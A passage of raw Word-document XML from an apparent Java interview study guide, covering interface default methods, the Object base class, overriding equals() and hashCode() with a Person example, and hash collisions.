          <w:numId w:val="4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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can add a new default method in the child class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and it will not cause any issues for the existing classes, provided that they don't try to access this new method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F3A759" w14:textId="77777777" w:rsidR="00AA2CA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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dding a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new default method to the parent interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> does </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> break existing implementations of the interface; those classes will inherit the new method automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABAD29E" w14:textId="07390B57" w:rsidR="00342FA5" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA2CA6" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="482"/>
        </w:numPr>
        <w:jc w:val="both"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conflicts</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> arise if multiple interfaces have default methods with the same signature, and the child class will need to explicitly </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resolve the conflict</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by overriding the method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F9DA47" w14:textId="78FEF71E"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DBD0F41">
          <v:rect id="_x0000_i1220" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0A1DA9" w14:textId="3F131CE9" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="008E7699">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc196307555"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>In Java, which class is the base class of all the classes</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="2063FC7C" w14:textId="38DB617A" w:rsidR="00D82531" w:rsidRPr="00CE4B95" w:rsidRDefault="00D82531" w:rsidP="001A4E3C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">In Java, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> class is the base class of all classes. Every class in Java, whether explicitly or implicitly, inherits from the Object class. It provides fundamental methods such as equals(), hashCode(), toString(), and others, which can be overridden by subclasses for specific behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1631391B" w14:textId="18414585"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B5EA088">
          <v:rect id="_x0000_i1221" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F59ECAB" w14:textId="5AB1CBAF" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="00D4020D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc196307556"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Why is the equals method required</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="15FB51EA" w14:textId="38561C2D" w:rsidR="00EC6616" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6616" w:rsidP="006D687B">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equals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method in Java is required to determine if two objects are considered equal. By default, the equals() method in the Object class checks if the two object references point to the same memory location, i.e., if they are the exact same object. However, for many types of objects, especially in collections like HashMap, HashSet, and List, it's necessary to define what it means for two objects to be logically equal, not just refer to the same memory location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65823CDF"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 are some reasons why the equals() method is needed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5066200F" w14:textId="77777777" w:rsidR="00EC6616" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6616" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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gical Equality</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E8D29C" w14:textId="77777777" w:rsidR="00EC6616" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6616" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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example, in a Person class, two Person objects with the same name and age may be considered logically equal, even if they are different instances (i.e., stored in different memory locations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E4B1D8" w14:textId="77777777" w:rsidR="00EC6616" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6616" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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rrectness in Collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E877905" w14:textId="77777777" w:rsidR="00EC6616" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6616" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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 collections like HashSet and HashMap rely on the equals() method to check if an element or key already exists in the collection. Without a properly overridden equals() method, these collections would not function as expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3A8E95" w14:textId="77777777" w:rsidR="00EC6616" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6616" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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sistent with hashCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777CB4D4" w14:textId="77777777" w:rsidR="00EC6616" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6616" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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wo objects are considered equal by the equals() method, their hashCode() values must also be the same. This is critical for the correct functioning of hash-based collections like HashMap and HashSet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06322CE5" w14:textId="77777777" w:rsidR="00EC6616" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6616" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ustom Equality</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF0F4AE" w14:textId="77777777" w:rsidR="00EC6616" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6616" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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You can customize the logic for object equality based on specific fields, such as checking if two Employee objects are equal based on their id and name rather than their memory address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE7867D" w14:textId="77777777" w:rsidR="00EC6616" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6616"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601F23A1"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Person {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A6B680"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ring name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B40C45"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int age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21475649" w14:textId="77777777" w:rsidR="00EC6616" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6616" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48C5F03B"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onstructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9DECBC"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Person(String name, int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018FD852"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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066A642F"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age = age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9220DD"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3038FB1" w14:textId="77777777" w:rsidR="00EC6616" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6616" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AAC45E2"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Overriding equals method to compare based on name and age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0194A5"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6DB0317D"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boolean equals(Object obj) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B67876B"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this == obj) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC2C2D9"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true; // Same object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B9FAC3"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0D5F576"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obj == null || getClass() != obj.getClass()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B369BEA"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false; // Null or different class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59083726"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B389029"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erson person = (Person) obj;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FF4931"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age == person.age &amp;&amp; name.equals(person.name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A79D89"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0538E93" w14:textId="77777777" w:rsidR="00EC6616" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6616" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10917645"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3772F8E1"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int hashCode() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C291F9"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Objects.hash(name, age); // Consistent with equals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5366ED2D"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EA5AA85"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48B7B9F" w14:textId="77777777" w:rsidR="00EC6616" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6616" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16124B4C"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Test {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DF4F7E"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4FF9670B"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erson p1 = new Person("John", 30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF2FBC5"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erson p2 = new Person("John", 30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB1882F"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EC2682F"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sing the overridden equals method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0323CF9C"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p1.equals(p2));  // Output: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE042F4"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97555B9"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56664D7" w14:textId="77777777" w:rsidR="00EC6616" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6616"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 p1 and p2 are logically equal because they have the same name and age, even though they are two different objects in memory. This behavior is controlled by the overridden equals() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB74E2C" w14:textId="29470CAB"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EA98B04">
          <v:rect id="_x0000_i1222" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCDAB88" w14:textId="7A2159EB" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="00D4020D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc196307557"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Is it possible to have the same hashcode for multiple objects</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="40CA11CB" w14:textId="7CB2D75E" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27" w:rsidP="006D687B">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es, it is possible for multiple objects to have the same </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hashCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. This situation is known as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash collision</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23197356" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226A74DF"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hashCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method in Java returns an integer value (hash code) that represents the object. The hash code is used by collections like HashMap, HashSet, and others to quickly compare objects and store them in hash-based data structures. Ideally, each object should have a unique hash code, but this is not always guaranteed due to the limited range of integer values that the hashCode() method can return (it returns a 32-bit signed integer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6912658D"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us, it's possible that two or more objects can have the same hash code even though they are logically distinct objects. When this happens, it's called a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash collision</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CECA90" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27"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ash Collision in Hash-Based Collections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753D9ED9" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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When two different objects have the same hash code, the collection (e.g., HashMap, HashSet) needs to compare the objects more thoroughly using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>equals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method to ensure they are truly equal. This is why it's important to correctly override both the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hashCode()</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equals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> methods in your class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5803CEF0" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27" w:rsidP="006D687B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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two objects have the same hash code, they are stored in the same bucket in a hash-based collection. The collection will then rely on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>equals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method to distinguish between the objects in the same bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2526B185" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27"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Hash Collision:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5874F71C"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HashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A38C511" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EECD321"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Person {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6C4413"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ring name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7C5164"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int age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4B1D8D" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27" w:rsidP="006D687B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B99B38"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Person(String name, int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25846386"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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EADDA7"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age = age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67463592"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B81FD15" w14:textId="77777777" w:rsidR="00B71D27" w:rsidRPr="00CE4B95" w:rsidRDefault="00B71D27" w:rsidP="006D687B">
